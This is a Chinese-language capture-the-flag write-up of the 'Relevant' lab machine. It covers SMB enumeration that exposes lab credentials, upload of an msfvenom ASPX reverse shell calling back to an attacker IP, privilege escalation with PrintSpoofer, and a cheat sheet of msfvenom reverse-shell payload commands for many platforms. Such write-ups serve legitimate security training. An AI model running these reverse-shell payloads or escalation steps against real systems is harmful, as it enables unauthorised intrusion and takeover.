Relevant

Relevant

信息收集:

nmap扫下端口

image-20241125145705709

访问80端口,是IIS服务 发现445和139端口开启,尝试利用MS17-010

但是并不太行,利用msf模块里面的永恒之蓝检测发现,通过445登录时超时

image-20241125153157156

这个思路不行的话,就换一个思路 枚举smb服务

image-20241125212119274

发现能枚举到一个nt4wrksv

发现是无密码的 里面有一个passwords.txt文件 把它给get下来

1
get passwords.txt

得到经过base64加密的用户名和密码

解码得到

1
2
3
Bob - !P@$$W0rD!123

Bill - Juw4nnaM4n420696969!$$$

漏洞利用

上面的用户名和密码 刚开始想着去再次利用ms17-010 来着 后来发现还是不行 ,看一下是否能上传文件

image-20241127171150724

结果是可以的,下面的思路就是上传一个反弹shell的文件

根据信息可以知道是一个asp.net框架

image-20241127173923858

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.14.74.6 LPORT=6666 -f aspx -o reverse.aspx

然后 利用msf接收shell

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST your-thm-ip
set LPORT listening-port
run

image-20241127185844997

提权

whoami /priv看一下

image-20241127195305084

能搜到SeImpersonatePrivilege 能够进行提权

https://github.com/itm4n/PrintSpoofer (提权工具下载)

1
PrintSpoofer64.exe -i -c cmd

image-20241127202016757

总结

参考链接:

https://blog.csdn.net/u012206617/article/details/130330198

各种系统所对应的马总结:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Linux

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl


Relevant
http://example.com/2024/11/03/Relevant/
作者
FSRM
发布于
2024年11月3日
更新于
2024年11月27日
许可协议